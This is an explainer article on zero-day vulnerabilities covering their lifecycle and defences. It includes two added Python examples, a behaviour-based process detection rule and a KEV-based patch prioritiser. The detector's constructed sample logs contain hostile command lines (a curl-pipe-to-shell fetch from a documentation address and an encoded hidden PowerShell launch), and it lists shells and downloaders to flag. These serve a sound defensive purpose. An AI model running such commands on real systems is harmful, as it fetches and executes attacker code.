What Is a Zero-Day Vulnerability?


A zero-day is a software vulnerability that the vendor doesn't yet know about, or has only just learned of, so no patch exists: defenders have had "zero days" to fix it. When attackers find such a flaw first and exploit it, the result is a zero-day attack that even a fully patched system can't initially stop. This page explains what zero-days are, why they're so dangerous, and what you can actually do about them.

Reviewed and kept current by the Coppers.io editorial team (see how we research).

Breaking down the term

The phrase refers to time: developers have had zero days to address the flaw because they only learn of it once it’s already being exploited (or publicly disclosed). Three related terms get used loosely:

  • Zero-day vulnerability — the unknown, unpatched flaw itself.
  • Zero-day exploit — the technique or code that takes advantage of it.
  • Zero-day attack — actually using that exploit against targets.

Why zero-days are so dangerous

With a normal vulnerability the vendor releases a patch, and the race is to apply it before attackers strike. With a zero-day there is no patch to apply, so update-based and signature-based defences can't help at first. That makes zero-days prized by criminals and nation-states alike, and working exploits for them can sell for large sums on grey and black markets. They tend to be spent on stealthy, high-value intrusions, because every use risks revealing the flaw and triggering a patch.

The lifecycle of a zero-day

  1. A flaw exists in software, unknown to the vendor.
  2. Someone discovers it — a researcher, a criminal, or a broker.
  3. An exploit is developed to take advantage of it.
  4. It’s used or disclosed — attacks begin, or it’s reported to the vendor.
  5. The vendor patches it — once known, a fix is built and released.
  6. Users update — the window closes as the patch rolls out (now an “n-day”).

The zero-day window proper runs from step 3 to step 5. Exposure doesn't end until step 6, though: once the fix ships, the flaw is an n-day, and unpatched systems remain just as exploitable as before. That is why patch speed matters.

Can you defend against an unknown flaw?

You can’t patch what isn’t known yet — but you can shrink your exposure and limit the damage:

  • Patch promptly and turn on automatic updates. Most real-world attacks use known flaws; the faster a fix lands, the shorter the window after a zero-day becomes an n-day.
  • Use layered security. Firewalls, anti-malware with behavioural detection, and a WAF can block or flag what an exploit does (a web server spawning a shell, a document opening a PowerShell prompt) even when there is no signature for the exploit itself.
  • Apply least privilege and network segmentation so a compromised app or account can't reach everything, and so a successful exploit only gets the rights of the process it landed in.
  • Reduce your attack surface: remove unused software and limit exposed services. A flaw in software you don't run can't hurt you.
  • Keep offline or versioned backups so you can recover if ransomware arrives via a zero-day.
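To make the "catch the behaviour, not the signature" point concrete, here is an added example (not code from the original article) of the kind of rule an EDR or log pipeline applies: it ignores which bug was exploited and instead flags a parent/child process relationship that a web server or document viewer should never produce. The log format, the process-name lists and every line in SAMPLE_LINES are constructed for this example and are assumptions, not real telemetry; 203.0.113.0/24 is a documentation-only address range.

```python
"""Behaviour-based detection over constructed process-creation events.

Added example, not code from the original article. A web server or
document viewer spawning a shell or a download tool is suspicious no
matter which vulnerability got the attacker there, so this rule still
fires when the exploit itself has no signature yet.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    host: str
    user: str
    parent: str    # image name of the parent process
    child: str     # image name of the newly created process
    cmdline: str


# Parents that should never launch shells or downloaders in normal operation.
# This list is an assumption; tune it to what actually runs in your estate
# (for example "java" is a normal parent of "sh" on a build server, but not
# on a web front end).
SENSITIVE_PARENTS = {
    "httpd", "nginx", "java", "w3wp.exe",
    "winword.exe", "excel.exe", "acrord32.exe",
}
SHELLS_AND_DOWNLOADERS = {
    "sh", "bash", "dash", "cmd.exe", "powershell.exe", "pwsh",
    "curl", "wget", "certutil.exe",
}


def parse_line(line: str) -> ProcEvent:
    """Parse one pipe-separated line: ts|host|user|parent|child|cmdline.
    maxsplit=5 keeps any '|' inside the command line intact."""
    ts, host, user, parent, child, cmdline = line.strip().split("|", 5)
    return ProcEvent(ts, host, user, parent, child, cmdline)


def suspicious(ev: ProcEvent) -> Optional[str]:
    """Return a reason if the event breaks a behaviour rule, else None."""
    if ev.parent.lower() in SENSITIVE_PARENTS and ev.child.lower() in SHELLS_AND_DOWNLOADERS:
        return f"{ev.parent} spawned {ev.child}"
    return None


def detect(lines: List[str]) -> List[dict]:
    """Run the rules over raw log lines and return one alert per hit."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        reason = suspicious(ev)
        if reason:
            alerts.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                           "reason": reason, "cmdline": ev.cmdline})
    return alerts


# Constructed sample telemetry (not real data). Lines 2 and 3 are the kind
# of post-exploitation behaviour a zero-day typically leads to; lines 1 and
# 4 are ordinary activity and must not fire.
SAMPLE_LINES = [
    "2024-05-01T10:00:01Z|web01|www-data|nginx|nginx|nginx: worker process",
    "2024-05-01T10:00:05Z|web01|www-data|java|sh|sh -c curl http://203.0.113.5/x.sh | sh",
    "2024-05-01T10:00:06Z|ws12|alice|winword.exe|powershell.exe|powershell -nop -w hidden -enc SQBFAFgA",
    "2024-05-01T10:00:09Z|web01|root|cron|bash|/usr/bin/bash /etc/cron.daily/logrotate",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LINES):
        print(f"ALERT {a['ts']} {a['host']} ({a['user']}): {a['reason']} :: {a['cmdline']}")
```

The alert keeps the user field on purpose: it shows whether the exploited service was running as a low-privilege account (www-data above) or as root, which is the least-privilege point from the list. The rule is deliberately coarse; in practice you add exceptions for known-good parents rather than weaken the parent/child pairing itself.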

Zero-days and everyday users

For most people, the realistic risk isn't being individually targeted by an exotic zero-day; it's failing to patch known flaws quickly. Turn on automatic updates, run reputable security software, and follow good security basics, and you've handled the practical threat. Organisations at higher risk add threat detection and rapid incident response. The US CISA also publishes a Known Exploited Vulnerabilities (KEV) catalog of flaws confirmed to be exploited in the wild, which is a good list to patch first.
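As an added example of using that catalog to prioritise (not code from the original article or from CISA), the script below ranks scanner findings by whether they appear in a KEV-style feed. Everything in it is constructed: the CVE identifiers are deliberately non-existent placeholders (CVE-2099-*), the catalog excerpt is a stand-in and the scanner findings are made up. The field names are assumed to follow the JSON feed CISA publishes for the KEV catalog, so the same code could be pointed at the real file. It also separates the two cases the article draws apart: a finding with a patch gets "patch now", while a finding with no fix yet (a zero-day) gets the catalog's mitigation advice instead.

```python
"""Prioritise patching with a CISA KEV-style catalog.

Added example, not code from the original article or from CISA. The
catalog excerpt and scanner findings are constructed; the CVE IDs are
placeholders that do not exist.
"""
import json
from datetime import date
from typing import Dict, List

# Constructed excerpt in the KEV feed's shape (assumed field names).
KEV_JSON = """
{
  "title": "Constructed KEV excerpt (not the real catalog)",
  "catalogVersion": "example",
  "count": 3,
  "vulnerabilities": [
    {"cveID": "CVE-2099-0001", "vendorProject": "ExampleCorp", "product": "Gateway",
     "vulnerabilityName": "ExampleCorp Gateway remote code execution",
     "dateAdded": "2024-05-10", "shortDescription": "Placeholder.",
     "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2024-06-01", "knownRansomwareCampaignUse": "Known", "notes": ""},
    {"cveID": "CVE-2099-0002", "vendorProject": "ExampleCorp", "product": "Mailer",
     "vulnerabilityName": "ExampleCorp Mailer authentication bypass",
     "dateAdded": "2024-06-05", "shortDescription": "Placeholder.",
     "requiredAction": "Apply mitigations per vendor instructions or discontinue use until a patch is available.",
     "dueDate": "2024-07-15", "knownRansomwareCampaignUse": "Unknown", "notes": ""},
    {"cveID": "CVE-2099-0004", "vendorProject": "ExampleCorp", "product": "Agent",
     "vulnerabilityName": "ExampleCorp Agent privilege escalation",
     "dateAdded": "2024-04-29", "shortDescription": "Placeholder.",
     "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2024-05-20", "knownRansomwareCampaignUse": "Unknown", "notes": ""}
  ]
}
"""

# Constructed vulnerability-scanner output: which placeholder CVE was seen
# on which host, and whether the vendor has shipped a fix yet.
SCANNER_FINDINGS = [
    {"host": "db01",  "cve": "CVE-2099-0003", "patch_available": True},
    {"host": "web02", "cve": "CVE-2099-0002", "patch_available": False},
    {"host": "ws12",  "cve": "CVE-2099-0004", "patch_available": True},
    {"host": "web01", "cve": "CVE-2099-0001", "patch_available": True},
]


def load_kev(text: str) -> Dict[str, dict]:
    """Index the catalog by CVE ID."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


def tier(finding: dict, kev: Dict[str, dict], today: date) -> int:
    """1 = in KEV and used by ransomware, 2 = in KEV and past the due date,
    3 = in KEV, 4 = not known to be exploited in the wild."""
    entry = kev.get(finding["cve"])
    if entry is None:
        return 4
    if entry.get("knownRansomwareCampaignUse") == "Known":
        return 1
    if date.fromisoformat(entry["dueDate"]) < today:
        return 2
    return 3


def action(finding: dict, kev: Dict[str, dict]) -> str:
    """Patch if you can; with no fix yet, fall back to mitigation."""
    if finding["patch_available"]:
        return "patch now"
    entry = kev.get(finding["cve"])
    if entry is not None:
        return "no patch yet: " + entry["requiredAction"]
    return "no patch yet: isolate the service and apply vendor mitigations"


def rank(findings: List[dict], kev_text: str, today_iso: str) -> List[dict]:
    """Order findings by tier, then earliest due date, then host name."""
    kev = load_kev(kev_text)
    today = date.fromisoformat(today_iso)

    def key(f: dict):
        entry = kev.get(f["cve"])
        due = entry["dueDate"] if entry else "9999-12-31"
        return (tier(f, kev, today), due, f["host"])

    return [
        {"host": f["host"], "cve": f["cve"], "tier": tier(f, kev, today),
         "action": action(f, kev)}
        for f in sorted(findings, key=key)
    ]


if __name__ == "__main__":
    for row in rank(SCANNER_FINDINGS, KEV_JSON, "2024-06-10"):
        print(f"tier {row['tier']}  {row['host']:6} {row['cve']}  {row['action']}")
```

The tiers encode the article's advice: known-exploited flaws beat everything else, ransomware use beats a missed due date, and a finding that isn't in the catalog waits even though it is still worth patching. Real scanners also report a severity score; adding it as a later sort key is the natural extension.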

The bottom line

A zero-day is a flaw the vendor doesn’t know about yet, so no patch exists — which is exactly what makes zero-day exploits so dangerous and valuable. You can’t pre-empt an unknown bug, but you can update fast, layer your defences, limit privileges, and back up, which together neutralise the vast majority of real-world attacks. The biggest everyday risk is slow patching of known flaws, so automatic updates are your best friend.

FAQs

  • What is a zero-day vulnerability? A software flaw that the company that made the software doesn't know about yet, so no fix exists. The name reflects that developers have had zero days to patch it, leaving systems exposed until a fix is created and installed.
  • What's the difference between a zero-day vulnerability, exploit and attack? The vulnerability is the unknown flaw itself. The exploit is the code or technique that abuses it. The attack is the use of that exploit against real targets. They describe three stages of the same problem.
  • Why are zero-days so dangerous? Because there's no patch and no signature for them yet, so even fully updated systems and traditional defences can't initially block them. That makes zero-days valuable to attackers and effective for stealthy, high-impact intrusions before the vendor can respond.
  • Can you defend against a zero-day? Not by patching the unknown flaw, but you can reduce risk and damage: patch known issues fast, use layered defences like firewalls and anti-malware that detect malicious behaviour, apply least privilege, limit your attack surface, and keep backups. These blunt most real-world attacks.
  • How worried should ordinary users be? Genuine zero-days are relatively rare and often aimed at high-value targets, since they're costly to find. The far more common threat for ordinary users is attackers exploiting known, already-patched flaws on systems that simply haven't been updated yet.